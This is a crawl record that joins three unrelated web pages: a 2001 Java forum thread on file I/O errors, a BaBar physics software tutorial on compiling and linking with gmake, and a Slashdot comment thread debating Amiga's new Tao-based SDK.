Welcome. Click here to access the new home of Gamelan's discussions on Java. Programming assistance Matt Andrew - 09:26am Dec 6, 2001 EDT I am trying to write to a file. When I build it I get an error that says "DataOutputStream is not an interface name". Here is some of my source code: import com.ms.wfc.app.*; import com.ms.wfc.core.*; import com.ms.wfc.ui.*; import com.ms.wfc.html.*; import java.awt.event.*; import java.io.*; public class newRecords extends Form implements DataOutputStream { main record = new main(); DataOutputStream ostream; public newRecords() throws IOException { super(); try { ostream = new DataOutputStream(new FileOutputStream()); } catch(IOException e) { System.err.println("File not opened"); System.exit(1); } button1.addOnClick(ostream.writeUTF(record.date)); button1.addOnClick(ostream.writeUTF(record.checkNum)); button1.addOnClick(ostream.writeUTF(record.description)); button1.addOnClick(ostream.writeUTF(record.debit)); button1.addOnClick(ostream.writeUTF(record.payment)); button1.addOnClick(ostream.writeUTF(record.fees)); // Required for Visual J++ Form Designer support initForm(); // TODO: Add any constructor code after initForm call } I would love an suggestions anyone might have. I have been working on this for over a week. Thanks. It would help when you post error messages, if you would copy and paste the FULL text of the message. That usually includes the line number of the error and shows the line itself where the error was. That can save a lot of guessing!!! The error is that your class tries to "implement" a class and not an interface. You can only implement interfaces, NOT classes. To get your code to compile, remove the "implements" clause from the class statement. I have to write a prog where I have to read a file ... This can be easily done using file reader but the problem is this file has new lines every now and then and I want my programme to read the file every time a new line is added ... Also since this file is very long, I don't want my programme to read from the begning every time a new line is added. It should read only the new line... Pls help... I need quick reply If you want to read the file at any location, not just sequentially from the beginning, use the RandomAccessFile class. It allows you to position to any byte in the file with the seek() method. The problem is knowing where individual records begin and end. One way to solve that problem is to have all the records be of a fixed size. the jdk version i have is 1.3.1 and there are two DataOutputStream classes, one belongs to java.io which is a class, and one belongs to org.omg.CORBA which is an interface so, if your intention is org.omg.CORBA, do implements org.omg.CORBA hi, ... implements DataOutputStream can't work as DataOutputStream is not an interface so it can't be implemented ;-)) HTH, Christian I've to give the full path while accessing the file using the following code. Is there any alternative where i can provide the relative path and still get the desired result? BufferedReader in = new BufferedReader (new FileReader ("/apps/secDBadmin/classes/database.cfg")); I'm accessing the file database.cfg from a class which is inside the same folder (/apps/secDBadmin/classes)..
http://www.developer.com/java/other/article.php/949021/Java-Discussion-Programming-assistance.htm
CC-MAIN-2016-18
refinedweb
550
64.91
To turn C++ code into a runnable program, you need to compile and link the code. Compiling the code puts it together into things called libraries (lib files). Linking the code uses the information in these libraries to build a program. The program is the ultimate goal of the compile-and-link stage. The programs are usually called executables, binaries, or applications. BaBar application names usually end in "App". For example, when you compile and link the code in the BetaMiniUser package, it produces an application called BetaMiniApp. In the last section, you made some changes to C++ code in the BetaMiniUser package. But in order for these changes to be implemented, you have to recompile and relink your code to make a new BetaMiniApp that includes your changes. This section begins with an introduction to gmake, BaBar's compile-and-link utility. Then you will compile and link your code from Example 2. The section also includes suggestions for how to deal with compile-and-link problems, and an optional, more detailed discussion of gmake's GNUmakefiles. BaBar's compile-and-link utility is called gmake. The basic gmake command is: > gmake <target> This tells gmake to "make" or "build" the target. Different targets correspond to different gmake actions. Some important targets include lib to compile code, and bin to link code. lib bin The available targets and the instructions for building them are defined in a file called GNUmakefile. Whenever you issue a gmake command, gmake looks in the current directory for a GNUmakefile. Then it follows the instructions for that target. GNUmakefile There is a GNUmakefile in every release, including the test release you created. GNUmakefiles are also included in any package that you check out. The GNUmakefile of the release is the master GNUmakefile. This is why you usually issue gmake commands from the test release directory. Commands issued from a package in a release will only have access to targets defined in the package's GNUmakefile. GNUmakefiles For general use of BaBar software, you will use gmake commands often, but you will probably not need to write or modify a GNUmakefile. Even users writing new analysis modules rarely need to make significant modifications to a GNUmakefile.. These files record the dependencies among your source code files. Their names have the same root as the source file and a '.d' suffix. In BaBar software these files are stored in the tmp directory of your release. Like the lib and bin directories, the tmp directory has a subdirectory for each architecture that you compile code on. The command to compile your code is gmake lib. Compiling a C++ file converts it. Once object modules have been created they need to be linked together to build the executable. The command to link your code is gmake bin. The new executables are placed in your bin/$BFARCH directory. If you list this directory, you will see a '*' after the names of most of the files, indicating that they are executables.. A related useful target is cleanarch. The command gmake cleanarch is like gmake clean, but it removes only library, binary and temporary files saved under the current architecture (i.e. the architecture set when you most recently issued an srtpath command in the current session). It leaves the libraries and/or binaries built with other architectures intact.: gmake lib BetaMiniUser.bin You will notice that the link command, gmake BetaMiniUser.bin, is a bit different from the gmake bin command that you used before. In general, commands of the form "gmake package.target" perform the task "gmake target" on the files in "package" only. The command "gmake BetaMiniUser.bin" links only the code in BetaMiniUser. This is useful if you have a lot of packages checked out, because instead of making a bunch of executables that you don't need, you make only the BetaMiniUser executables.06 2.4.21-47.ELsmp #1 SMP Thu Jul 20 10:30:12 CDT 2006 i686 athlon i386 GNU/Linux [uname -a] echo "-> lib"; for package in xx BetaMiniUser database workdir; do if [ "$package" != "xx" -a "$package" != "BASE" ]; then gmake $package.lib NOPKG=yes; fi; done ana42>. Quick links: Now it is time to compile and link your new code from Example 2 of the Editing Code section. First, make sure you have done: ana42> srtpath <enter> <enter> ana42> cond22boot If you look in your lib and bin directories, you will see your old lib and bin files from the Quicktour: ana42> ls -l lib/$BFARCH total 2520 -rw-r--r-- 1 penguin br 2577960 Apr 20 21:17 libBetaMiniUser.a drwxr-xr-x 5 penguin br 2048 Apr 20 21:05 templates ana42> ls -l bin/$BFARCH/ total 69009 -rwxr-xr-x 1 penguin br 70663891 Apr 20 21:21 BetaMiniApp -rw-r--r-- 1 penguin br 72 Apr 20 21:23 Index Let's clean out these old files before we begin, just to be on the safe side: ana42> gmake clean GNU Make version 3.79.1, Build OPTIONS = Linux24SL3_i386_gcc323-Debug-native-Objy-Optimize-Fastbuild-Ldlink2-SkipSlaclog-Static-Lstatic Linux yakut03 2.4.21-47.ELsmp #1 SMP Thu Jul 20 10:30:12 CDT 2006 i686 athlon i386 GNU/Linux [uname -a] -> clean: -> cleanarch: Linux24SL3_i386_gcc323 'tmp/Linux24SL3_i386_gcc323' is soft link to /afs/slac.stanford.edu/g/babar/build/p/penguin/ana42/tmp/Linux24SL3_i386_gcc323 'shtmp/Linux24SL3_i386_gcc323' is soft link to /afs/slac.stanford.edu/g/babar/build/p/penguin/ana42/shtmp/Linux24SL3_i386_gcc323 rm -f -r mkdir -> installdirs: The gmake messages are actually quite useful - gmake tells you what it is doing. You can see from the above message that gmake clean removes your old xxx/$BFARCH directories, and then does a "gmake installdirs" to put back new, empty ones. If you check your lib and bin directories again, you will find that they are now (almost) empty: ana42> ls -l lib/$BFARCH total 2 drwxr-xr-x 5 penguin br 2048 Apr 21 20:44 templates ana42> ls -l bin/$BFARCH total 0 ana42> Now you can compile and link your code. Compile and/or link jobs should always be send to the bldrecoq queue. From your test release issue ana42> rm all.log ana42> bsub -q bldrecoq -o all.log gmake all A feature of the batch system (bsub part of the command) is that log files are NOT overwritten. Instead, if you do not remove your old all.log file, then the output for the current job will be appended to the bottom of the old log file. To avoid that, you either have to delete the old log file, or choose a new name for your new log file. That is why you removed the old log file above. The gmake all command compiles and links the code. The first thing to do after compiling and linking is to check your bin directory to make sure that your binary was produced and that it is brand new: ls -l bin/$BFARCH total 69014 -rwxr-xr-x 1 penguin br 70669051 Apr 21 20:56 BetaMiniApp -rw-r--r-- 1 penguin br 72 Apr 21 20:57 Index If you make a mistake when you edit BaBar code, then you will get an error messages on your terminal or in your log file. There are two types of problems that you could encounter: This section will focus on the first type of error: compile and link errors. Later, the debugging section will teach you how to deal with run-time errors. You may not have a successful compilation the first time. The more code you edit, the more likely you are to make a small mistake that could cause the compile or link process to fail. The first thing you should do after every compile or link is check your bin directory to make sure your binary was produced and that it is brand new. If it was not produced, then you need to look in your log file to find out why gmake failed. As an example, suppose you accidentally removed the line #include "BetaMiniUser/QExample.hh" When this is done, you check the bin directory: ana42> ls -l bin/$BFARCH total 1 -rw-r--r-- 1 penguin br 72 May 15 04:40 Index You investigate the log file for further clues. Here is the log file: all.log with errors. Note that the target that gmake is working on is indicated by the little arrows in the log file, "->BetaMiniUser.lib" and "->BetaMiniUser.bin".) Scrolling down the log file, you find several gmake error messages. There's one in the BetaMiniUser.lib stage: gmake[3]: *** [/afs/slac.stanford.edu/u/br/penguin/ana42/lib/Linux24SL3_i386_gcc323/l ibBetaMiniUser.a(QExample.o)] Error 1 gmake[2]: *** [BetaMiniUser.lib] Error 2 gmake[4]: *** [/afs/slac.stanford.edu/u/br/penguin/ana42/lib/Linux24SL3_i386_gcc323/l ibBetaMiniUser.a(QExample.o)] Error 1 Whenever you see those stars (***) and the word Error, that means you are in trouble. Now look at the lines just above the ***/Error line to find out what was the last thing gmake did before it failed. Right before the lib-stage error, the message is: Compiling QExample.cc [libBetaMiniUser.a] [cc-1] /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:25: syntax error before `::' token /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:37: syntax error before `::' token /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:51: syntax error before `::' token /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:57: warning: ISO C++ forbids declaration of `_numTrkHisto' with no type /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:57: `manager ' was not declared in this scope /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:58: warning: ISO C++ forbids declaration of `_pHisto' with no type /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:58: `manager ' was not declared in this scope /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:60: syntax error before `return' /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:66: syntax error before `::' token /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:75: syntax error before `::' token /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:83: syntax error before `->' token /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:86: `trkList ' was not declared in this scope /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:88: syntax error before `while' (In this case, the error messages for the lib and bin stages are identical. This does not always happen. In any case you should look at the errors from the earliest target first, because later targets depend on earlier targets. Fixing the lib-stage error might fix the bin-stage error automatically.) One message that is repeated over and over again is "syntax error before '::' token." What does that mean? You're not sure. So you decide to look at the first error message that occurs, since that is the first place that gmake ran into trouble: /afs/slac.stanford.edu/u/br/penguin/ana42/BetaMiniUser/QExample.cc:25: syntax error before `::' token QExample::QExample( const char* const theName, The job fails at the beginning of the QExample constructor. Not only that, but according to the error message, it fails before the '::' token. Now, there is only one thing in front of the '::' token: the word QExample. But QExample is a perfectly valid class - why should gmake think that it is a syntax error? It seems that for some reason, gmake does not recognize the QExample class. And if gmake does not recognize a class, then that is probably because it has not read the header file for that class. Sure enough, when you check QExample.cc, you find that you have forgotten to include QExample.hh. This would explain the other error messages as well: every time gmake sees "QExample", it is confused because it does not know what QExample is. Furthermore, it also does not recognize _numTrkHisto, because this object was defined in QExample.hh as a private member object. You put back the #include statement, and send your "gmake all" job again, ana42> rm all.log ana42> bsub -q bldrecoq -o all.log gmake all This time, everything worked fine: ana42> ls -l lib/$BFARCH total 2408 -rw-r--r-- 1 penguin br 2462826 May 15 04:43 libBetaMiniUser.a drwxr-xr-x 5 penguin br 2048 May 15 04:36 templates ana42> ls -l bin/$BFARCH total 48073 -rwxr-xr-x 1 penguin br 49225543 May 15 04:44 BetaMiniApp -rw-r--r-- 1 penguin br 72 May 15 04:44 Index There is a brand new BetaMiniApp! And you can tell from the time that BetaMiniUser's lib file has also been recompiled. Normally, gmake is pretty good at figuring out what needs to be recompiled and what doesn't. But to be safe, you can issue a "gmake clean" to clean out all the old lib and bin files before you recompile. The example above of course shows you only one example of the many, many possible error messages that can appear in your log file. Other typical compile errors include: srtpath Compile/link error messages can be confusing. It is not always obvious what the problem is. In the end, all you can do is try your best to decipher the log file. If you can't figure it out, then your best bet is to ask someone who has had more practice with gmake errors, or, if you are all alone, submit your problem to the prelimbugs Hypernews forum. When you submit your question, be sure to indicate: For example, if you could not figure out what was wrong in the above example, you would first explain your problem, and then provide the following details: You will get an answer much faster if you provide complete information. If your compile-and-link problem occurs in one of the Workbook examples, then you can email me, the Workbook editor, and I'll see what I can do. Perhaps you have discovered a bug in the Workbook! (But please try to solve it yourself, first.) Now you have learned most of what you need to know to use gmake to compile and link. But you may find it helpful to learn a bit more about how GNUmakefiles work. One of the virtues of GNUmakefiles is their ability to handle the many dependencies among the many, many lines of C++ code that must be put together to make an executable. This (optional) section revisits the GNUmakefile, with a focus on how these dependencies are managed. An executable is built from the code defined in multiple files. When changes are made in one or more of these files the code in the modified files and all dependent files will need to be re-compiled and re-linked. Compile and link commands often involve many options, such as directory search paths for included files, names for compiled files, warning messages, debugging information and so forth. Compile and link commands quickly become quite lengthy, and in large software projects the dependencies amongst files is usually rather involved. gmake's job is to manage this complicated process. GNUmakefiles define a set of instructions for how to compile and assemble code segments into the executable. The file also defines many variables such as search paths, which compiler to use, etc. The instructions specify the dependencies of the code segments so that the gmake utility can recognize only those components that need to be reprocessed. A well-written makefile can reduce unnecessary compilation and save much time. The gmake facility looks in the current directory for a file named GNUmakefile, makefile, or Makefile (in that order). The first one of these files found is used to define the dependency/build rules for the given target. The general structure of an instruction in the GNUmakefile consists of a target, a dependency, and a rule. Associated with each target is a set of dependent files. When any of the dependent files have been modified or if the target file does not exist, the target will be rebuilt (or built) in accordance with the rule. For example, a line in a GNUmakefile might be:. An example of a phony target is workdir's setup target. The command gmake workdir.setup does not compile or link code. Instead, it creates some links in workdir: PARENT, RELEASE, bin, and shlib. setup As such, to force a file to be recompiled, you may need to manually "touch" one of the relevant files. An example of such a command is: touch BetaMiniUser/AppUserBuildBase.cc Last modified: January 2008
http://www.slac.stanford.edu/BFROOT/www/doc/workbook/compile/compile.html
CC-MAIN-2017-17
refinedweb
2,806
64.81
Scala: Working with resources, folders and files Let’s briefly discuss how to deal with a resources folder and directories in Scala project. It’s pretty frequent case in a programming, when you need to interact with file system, Scala isn’t an exception. So how it can be done on practice? If you want to read about the most powerful way of reading & writing files in Scala, please follow the link. I’m going to demonstrate a short example on a real Scala project with a such structure: As you see it has the resources folder with files and directories inside of it. Access the resources folder In order to get a path of files from the resources folder, I need to use following code: object Demo { def main(args: Array[String]): Unit = { val resourcesPath = getClass.getResource("/json-sample.js") println(resourcesPath.getPath) } } An output of the code below, is something like this: /Users/Alex/IdeaProjects/DirectoryFiles/out/production/DirectoryFiles/json-sample.js Read file line by line In some sense a pure path to a file is useless. Let’s try to read the file from resources line by line. Scala can do it well: import scala.io.Source object Demo { def main(args: Array[String]): Unit = { val fileStream = getClass.getResourceAsStream("/json-sample.js") val lines = Source.fromInputStream(fileStream).getLines lines.foreach(line => println(line)) } } The output is { "name": "Alex", "age": 26 } List files in directory The final important and popular task is to list files from a directory. import java.io.File object Demo { def main(args: Array[String]): Unit = { val path = getClass.getResource("/folder") val folder = new File(path.getPath) if (folder.exists && folder.isDirectory) folder.listFiles .toList .foreach(file => println(file.getName)) } } Looks simple and efficient as well. I hope this article was useful for you. Leave your comments and like us on facebook!
http://fruzenshtein.com/scala-working-with-resources-folders-files/
CC-MAIN-2020-24
refinedweb
309
57.67
Hi I am having a file called Log.csv which contains 196 columns 9 of them empty and 1447 rows, I start reading the file but as I think I am facing a problem of getting the whole data, actually it gives me empty screen when print out on the screen. I need some help in reading the csv file and put it in array because later on I have to get the date (from the first column) and min,max for some other columns. I am really gratefull if anyone can help me. I am going to paste 1 line from my Log.csv and then paste my code. 11/10/2004,00:00:45,190,0,13.94,346.81,201.11,18.46,32,3,47,6, ,127,230,228,228,348,128,64,64,8,6,6,50,50,50,34,34,35,6,6,6,0, ,63,230,228,230,344,66,66,66,8,6,7,50,50,50,35,36,35,6,6,6,0, ,49.41,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,0.06,30.91,00,63,6,4,0, ,49.67,0.00,0.06,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,32.87,00,63,6,4,0, ,49.67,0.00,-0.30,32.87,00,63,6,4,0, ,49.94,0.00,-0.30,30.91,00,63,6,4,0, ,49.41,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,30.91,00,63,6,4,0, ,49.41,0.00,-0.30,32.87,00,63,6,4,0, ,49.67,0.00,-0.30,30.91,00,63,6,4,0, ,49.67,0.00,-0.30,32.87,00,63,6,4,0, ,49.41,0.00,0.06,32.87,00,63,6,4,0, ,49.67,0.00,0.06,30.91,00,63,6,4,0, , My code is #include <iostream> #include <fstream> using namespace std; float matrix_points[1447][196]; int main() { std::ifstream input_file("Log.csv"); int row(0), col(0); char buffer[256]; char line[255]; input_file.clear(); input_file.seekg(0); /* brings all the data in .csv file and put them in an array*/ while(!(input_file.eof())) { for ( col=0; col<196; col++) { if (matrix_points[row][col] != matrix_points[row][195]) { input_file.getline(line, sizeof(buffer), ','); matrix_points[row][col] = atof(line); } else { input_file.getline(line, sizeof(buffer), '\n'); matrix_points[row][12] = atof(line); } } row++; } /* for loop to print data on screen*/ for (int i=0; i< row ; i++) for (int j=0; j< col ; j++) { if (matrix_points[i][j] != matrix_points[i][195]) cout << matrix_points[i][j] << " " ; else cout << matrix_points[i][195]<< endl; } cout << row <<endl; cout << "\n\n"; // system("PAUSE"); return 0; }
https://www.daniweb.com/programming/software-development/threads/36795/csv-file
CC-MAIN-2017-43
refinedweb
491
73.68
Amiga's New SDK: A First Glance 106 Mike Bouma writes: "Recently it began raining news coverages about Amiga`s new OS in the mainstream press like CNN`s Digital Jam, The New York Times and Gamersdepot. The first impressions of the new SDK have been very positive. Lars Thomas Denstad has written a small article about his experiences with the new SDK so far." Re:Amiga? (Score:1) That's what I find so disturbing... Watch out if you use DC, it splits off the hydrogen and oxygen That's kinda what I'm *trying* to do... why the hell am I replying to this bullshit post anyhow? If you're like me, it's because you've been up for about 30 hours without sleep... Re:Look at the article, it's Elate. (Score:2) Amiga Inc really should get their developers' site up () if they hope to attract any developers. There's virtually no technical information up on amiga.com, nothing for developers. They've generated quite a bit of publicity, but I wonder, who is this publicity targeted to? Surely they should be courting developers at this stage. Re:now is the best time... (Score:4) The issue I was addressing wasn't so much hardware support as mindshare. Firstly, I agree that this is a Good Thing. Secondly, I am a fan of diversity... one person's "chaos" is usually everybody else's "choice". My lament, was that a certain operating system which shall remain nameless (oh hell, windows) managed to gain a massive mindshare in the mid-90's because the alternatives were underdeveloped. I recall with great clarity hearing over and over again in the mid-90's that Amiga was working on Wonderful Things in some secret European laboratory and that one day they would ride over the hill to save us from the... uh, evil wizard. Anyway, poor analogies aside, I must admit I feel a little disappointed. In '96 the options were: Mac (my choice... but near-bankrupt), BeOS (with two device drivers... and run by Gasse! ack!), NeXT (for less money than a BMW... and less software than Be), Linux (I admit I thought it was a science fair project... or a repackaged Xenix... how was I supposed to know?) or Winders. Really, I was waiting for Moses Amiga... Now that it's here; the "Mac is Back" (nice hardware, my choice of colour), BeOS can be hooked up to a printer finally (and do all sorts of other fine things), NeXT is OS X (and if DP4 is in indicator, it is going to be, at the very least, a lot of fun) and Linux is, uh, well you know Linux. Anyway, the white knight showed up only to find three other tin guys fighting the dragon... and the princess is already dead. That's all I had to say.... Re:It's DEAD. Spell it with me D E A D. (Score:1) AMI, WAKE UP! WAKE UP! Hmm...it certainly looks dead to me. :) BTW: I love my Amigas (500 & 2000)!!! Later... Re:It's DEAD. Spell it with me D E A D. (Score:2) - Spryguy A lot of us have been following it closely.... (Score:2) The Tao strategy seems to be a good one, and it seems to me the only road to take when their (Amiga's) hardware innovations have eight years of catching up to do. That way, if this does take off, we won't be tied to legacy hardware (or any hardware, come to think of it ;-), which is a Good Thing. Although some dissenters won't be happy until computing is 100% true to Jay, Dave, RJ and the others' vision, it can be said that big business and monopoly practice has put paid to that for the forseeable future. If we can make the new Amiga palatable enough that most of the philosophy is intact, then maybe we can finally call it a victory of sorts. Personally, I'll be glad to finally be able to say I code on Amigas without getting funny looks ;-) Re:TAO Similarities (Score:1) Re:The Amiga sucked in it's day. Thank God it's de (Score:1) Hmmm. That's strange. I could have sworn that this 13G hard drive in my Amiga is, well, a hard drive. Guess I must be wrong. "pathetic keyboard" It's got all the keys, they work, what more do you need? "No decent applications" Depends what you mean. Other than word processors, spreadsheets, databases, games, networking software, newsreaders, mail readers, web browsers, music sequencers, gfx software... "No multi-user" Nope, you are wrong again. Mine has it right here. Next? "No networking" Interesting. So how do you explain, "Karma collector", the fact that this Amiga upon which I am typing this, is not only connected to the Internet, but, via EtherNet, is connected to 1 PC, 2 Suns and an RS6000 and acts as the gateway.router to enable them all to access the internet? No no networking indeed! Pillock. "I could go on" Yes, I expect you could. And if you went on long enough, you MIGHT actually stumble over a fact, although I doubt you'd recognise one if you did. Idiot. (Score:1) -- Re:Wait one darn minute... (Score:1) But then, I suppose it is too much to expect people to actually CHECK before they post. Re:Sounds like a GPL violation (Score:1) Don't be shy. Please do tell us. BTW, before you answer, you might like to know (as you could have EASILY found out) that AInc have already released the sources to their modifications, as required by teh GPL. So, what violations are you talking about again? Re:It's DEAD. Spell it with me D E A D. (Score:1) -- Re:The Amiga sucked in it's day. Thank God it's de (Score:1) -- Amiga's orphaned OS (Score:1) Re:Amiga (Score:1) -- Re:Amiga? (Score:1) Better yet, go find an old heathkit power supply! TAO Similarities (Score:5) "This month Edge got a glimpse of the future, thanks to a demonstration of the Taos OS. In a nutshell, Taos enables programs coded on any machine to run on any other machine - in parallel, across any available processors in the system." "Taos ie even more amazing when you realise that it is the product of one man's efforts, coding for his own benefit, rather than cumulative efforts of some corporate programming team" The men denoted as the "Three Wise Men" were Chris Hinsley (inventor of Taos), Tim Moore and Francis Charig - directors of Taos Systems. This operating system was targeted at the console industry, where Chris had the idea of producing an operating system that would manage games and aid code portability. The first step was a macro set which Chris constructed for the assemblers of all the platformers he was writing on. Rather than write in the native assembler language, he wrote in the macro language he defined; he then devised a translator which would take the binary equivalent of that macro set and translate it, on the fly, into the instructions of a particular machine. The Taos kernel which is typically around 16K, is loaded into the processor at boot time. That kernel is specific to that particular processor. If the kernel finds it needs a translator tool, it brings in the translator as well. The application then gradually builds itself in memory: as a processor in the network needs to call functions it brings them in and binds the application. All programs are compiled or assembled into VP code and are kept in this form on disk. The VP code is translated into the native code of the processor on which it is run only when it is needed. The translation occurs as the VP code is loaded from the disk, across the network, and into the memory of the target processor. (Note this implies distribued computing.) However, this doesnt slow the system down: most processors can actually translate VP code into native code faster than VP code can be loaded from disk and sent across the network. And VP code is often more compact than native code; it takes up less disk space and is loaded faster. For instance, if you had a console that booted from CDROM, a CD would be pressed so that the first thing it did would be to load up the appropriate version of Taos, place it in memory and set it running. Then it would load the game code, which would run the operating system. The operating system would then load the specific tools required for that game and execution of the game would begin. Access to custom chips is taken care of automatically by Taos using a method called dynamic binding: individual chips are supported by VP libraries, which allow for a tool for that particular processor to be accessed by the system; the tools are bound in during runtime as they are needed. Dynamic binding also enables several processes to share tools, which is very memory efficient. "This 'virtual processor' works like a 16-bit register RISC microprocessor, explains Chris" "But it isnt an emulated technology; it actually translates into native code and it's the native code which runs and al the translations take place during the load time of the It is quite an effort to think of their feature list so many year ago Hardware Independance / Load balancing / Heterogenous processing / Dynamic Binding / Multi-threading / Parallelism as well as support for MPEG / Postscript and real time polygon rendering. In my opinion this guy is a genius, that relegates Linus to quite a mediocre status. I mean this OS is good by todays standard. I mean Linux is even now not brilliant at parallel processing and this OS can not only parallel process tasks but delegate them to entirely different chips. To put it into perspective, at the start of 1994 only 7 million people in US had computers with CDROM drives. I think he deserves a universal sympathy award for not patenting some of these concepts. Had these been patented you wonder whether technologies like Java and companies like Transmeta would still exist. I hope Amiga does well Naden (member of) Re:Amiga? (Score:1) Norway is nice country and Finland is a nice country also(And Linus comes from that country). And so is Denmark and Sweden (Lars Wirzenius) also. Very nice that sort of virualistaion is made for amiga SDK allready before they have it running native, sort of like vmware before they got the system of operation running in the natives. Re:Amiga (Score:1) Re:Amiga (Score:1) That could be said of the whole PC world? Does 640k ring a bell anywhere? MS-DOS (dead in Windows Millenium?... could be)? Layers and layers of stuff to cover and aging (and awful) base? I still have my Amiga, and with a 68060, at 50mhz, it sure feels faster than my 500Mhz Athlon, by the way. And it has a decent OS (much more efficient than Windoze and more ellegant and simple than UN*X)... it just doesn't play Quake (oops, I forgot. It does). Re:OK let's come to an understanding right now. (Score:1) Which is plenty of reason to criticise it. Stealth marketing an OS under the Amiga name has obvious attractions from a getting sheep to buy it perspective, but it's more than a trifle misleading to people who might want something with an API and suchlike that bears a vague resemblence to the classic AmigaOS. More importantly.. (Score:1) Am I the only person to see the important issues in life? Not very impressed, wait for the real thing. (Score:3) Re:Look at the article, it's Elate. (Score:1) This should have considerable speed benefits. Re:What's the point? (Score:2) Not threatened. Sick of hearing about resurrection (Score:1) Oh, and BTW, God is nothing more than a fairy tale told to children to keep them in line. What are you on about? The Amiga is vapour! (Score:1) The Amiga died decades ago. Get over it. Fzz fzzz splut spt spppppppp. (Score:1) Dead & gone. It sure isn't going to be changing the face of computing any time in the next CENTURY!. Get over it losers. Re:This reviewer isn't a real geek! (Score:1) At least the reviews are positive... (Score:1) royalty payments (Score:2) Re:Pretty useless review (Score:1) Re:The Truth About osm (Score:1) -- If all Amiga was offering was an OS... (Score:1) If all Amiga was offering was an OS, then the Amiga would be dead. However, if what they have works as they've described, then it's one more example of what the future holds. A small, efficient means for a single binary to run on a multitude of hardware may only be a laudable goal at present, but with the predicted increases in information-appliances it could become a necessity. Especially since what Amiga (and of course, Tao) seem to be building will run any any hardware and any operating system. The only question that remains is How Well Does It Work? URL Broke.. (Score:1) =) Re:OK let's come to an understanding right now. (Score:1) Re:Amiga (Score:1) Re:OK let's come to an understanding right now. (Score:1) OK let's come to an understanding right now. (Score:4) Re:This is great to see (Score:1) -- Re:now is the best time... (Score:1) Ya know, the minute I hit submit I realized I'd forgotten the ol' S/2.... oops. Personally, I chose to avoid it because it was a Big Blue project. The late 70' - early 80's (when my somewhat prejudicial views on operating systems were formed) was a time when BB was regarded by anyone who didn't wear sta-prest as being Evil Incarnate.... of course now I'm a slobbering fan of the ppc chips. My how times have changed :) Re:At least the reviews are positive... (Score:1) I like different OSes as much as anybody. I even have an ancient copy of OS/2 on a 386 laptop. I want Amiga to succeed. For some odd reason I lose hope after something has risen from the dead more times than a zombie. Amiga is dead. Let it have it's original glory intact. There is no need to beat this dead horse any further. Re:TAO Similarities (Score:1) Was it? The website was around 5 years ago, explaining what it did in quite a detailed way, and what platfroms it was available for. Re:OK let's come to an understanding right now. (Score:2) Sadly, they seem to have taken the next Amiga label too far, since the curent time at Be lloks a lot like Commodore circa the CD-TV - they've got some fantastic stuff, but marketing, user base, and available apps are all going poorly. If Amiga was smart... (Score:1) Re:Only RH6.1? (Score:1) Cluestick (Score:1) Re:Wait one darn minute... (Score:1) ps -elf | grep -v grep | my_backend meaning that you can go build whatever backends you like that works on the .o outputs from gcc and does the final parts itself without altering gcc. As someone said, they do provide the source, so this is a non-issue, but since gcc is just a launcher for cpp,cc1 and so on, you could easily exchange one part with your own prop. SW without breaking the GPL. the guy's name is Lars, you say? (Score:1) Re:Only RH6.1? (Score:1) Re:OK let's come to an understanding right now. (Score:1) 2D gfx (Score:1) Its nice to see someone catering to the 2D crown instead of 3D gfx accelerators and software. Re:OK let's come to an understanding right now. (Score:1) It sounds like you got so bored with the Amiga stories, that you stopped reading them. This article is quickie review of some software that has shipped. So your assumption that Amiga trademark holders just make announcements without ever releasing anything, is outdated.. It kinda makes you wish you had read the article instead of spouting off and making a prejudiced fool out of yourself in public, huh? Whoops! --- Re:Amiga (Score:1) I like my Athlon and I bought an Athlon because I've never used an Amiga but I'll be running an Amiga for my web browsing and other things. Amiga's not yet much of a compiling machine. And I like the fact you didn't read the article. True troll style. Re:At least the reviews are positive... (Score:1) Regarding the original Amiga and Os2, you can dwell on the past if you want to. This is not a zombie but something new. Yet it seems to have the same spirit as the original Amiga. A zombie is a dead body animated by an external force. This is something alive, animated from within. The body dies, but the spirit lives on and takes on new forms. Those who are attached only to the form cannot understand. What's the point? (Score:1) For all this "surprisingly fast" alpha blending, I fail to see how a VM running on top of Linux can provide faster alpha blending than an app built directly on top of Linux (implementing the same algorithms) could. Besides, what with the entire Java mess, do we really need yet another virtual environment? This reviewer isn't a real geek! (Score:3) a) There were girls present. b) People took their shirts off and danced about. I'll be damned if I'm going to consider this guy's opinion in technical matters! cnn transcript (Score:1) -- Re:This reviewer isn't a real geek! (Score:1) Re:URL Broke.. (Score:1) Re:What's the point? (Score:1) A virtual processor is a virtual machine. B) The SDK runs on top of linux, simply to assist porting apps from it and others. The OS runs nativly on 14+ CPUs and even if you code in Assembler its still portable. I wasn't aware of the 14+ CPUs, didn't seem to mention it in the main article - I stand corrected. Still, if you're coding in "assembler" and it runs on 14+ different CPUs, there's a virtual machine/virtual processor/emulator doing a lot of work. C) The Amiga apps are easily faster than ones on linux and they around 50% the size of normal linux apps and they consume far less memory How can something running on a virtual processor on Linux be faster than a native Linux app? Maybe the application and/or the underlying SDK possess some more efficient algorithms, but were those same algorithms implemented on top of the Linux native APIs it would be just as fast if not faster. As for the 'size' of native apps... well, that's the machine code, and you'd be referring to the size of the code compiled to Amiga instructions as opposed to (probably) x86 instructions. That's an Intel/IA-32 thing, not a Linux thing, and completely unrelated to the OS. CISC code, which is favourable for emulation/virtual machines, is known to be generally a lot smaller than RISC code (and a lot of optimised Pentium and later code stick to the basic IA-32 instructions, RISC-style, as the code runs a lot 